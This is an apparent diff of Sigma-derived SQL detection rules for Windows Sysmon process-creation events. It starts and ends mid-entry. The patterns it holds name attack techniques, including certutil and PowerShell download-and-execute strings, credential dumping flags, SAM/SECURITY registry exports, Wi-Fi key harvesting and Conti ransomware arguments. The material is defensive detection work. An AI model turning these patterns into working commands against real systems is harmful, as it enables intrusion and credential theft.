ParentImage LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": "proc_creation_win_cmd_unusual_parent.yml" }, { - "title": "VsCode Child Process Anomaly", - "id": "5a3164f2-b373-4152-93cf-090b13c12d27", + "title": 
"Suspicious ScreenSave Change by Reg.exe", + "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1546.002" ], "falsepositives": [ - "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. 
Remove or add processes accordingly" + "GPO" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\code.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' 
AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" + "filename": "proc_creation_win_reg_screensaver.yml" }, { - "title": "Potential Windows Defender Tampering Via Wmic.EXE", - "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", - "status": "experimental", - "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", - "author": "frack113", + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", + "status": "test", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_namespace_defender.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": 
"Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' 
ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "Suspicious Scan Loop Network", - "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "title": "Potential DLL Injection Or Execution Using Tracker.exe", + "id": "148431ce-4b70-403d-8525-fcc2993f29ea", "status": "test", - "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", - "author": "frack113", + "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ - "attack.execution", - "attack.t1059", - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentImage LIKE 
'%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_network_scan_loop.yml" + "filename": "proc_creation_win_lolbin_tracker.yml" }, { - "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", - "id": "eee00933-a761-4cd0-be70-c42fe91731e7", - "status": "test", - "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", - "author": "Victor Sergeev, oscd.community", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", + "status": "experimental", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentImage LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": 
"a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE 
'\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", - "id": "42b1a5b8-353f-4f10-b256-39de4467faff", - "status": "test", - "description": "Detect the harvesting of wifi credentials using netsh.exe", - "author": "Andreas Hunkeler (@Karneades), oscd.community", + "title": "Ilasm Lolbin Use Compile C-Sharp", + "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "status": "experimental", + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" ], - "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" + "filename": "proc_creation_win_lolbin_ilasm.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": "82880171-b475-4201-b811-e9c826cd5eaa", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detects Formbook like process 
executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND 
CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", - "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", + "title": "Suspicious Diantz Alternate Data Stream Execution", + "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", + "status": "test", + "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Authorized administrative activity" + "Very Possible" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_lolbin_diantz_ads.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", 
- "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "status": "test", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.impact", + "attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", - "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. 
Which is often used by attackers to perform AD enumeration.", - "author": "frack113", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.t1027", "attack.defense_evasion", - "attack.t1140", - 
"attack.t1059.001" + "attack.t1216" ], "falsepositives": [ - "Administrative script libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Lolbin Defaultpack.exe Use As Proxy", - "id": "b2309017-4235-44fe-b5af-b15363011957", + "title": "Suspicious Invoke-WebRequest Execution", + "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "status": "experimental", - "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", - "author": "frack113", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1218", - "attack.defense_evasion", - "attack.execution" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' 
ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_defaultpack.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", - "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Suspicious Child Process Created as System", + "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", + "status": "test", + "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", + "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.t1134.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image 
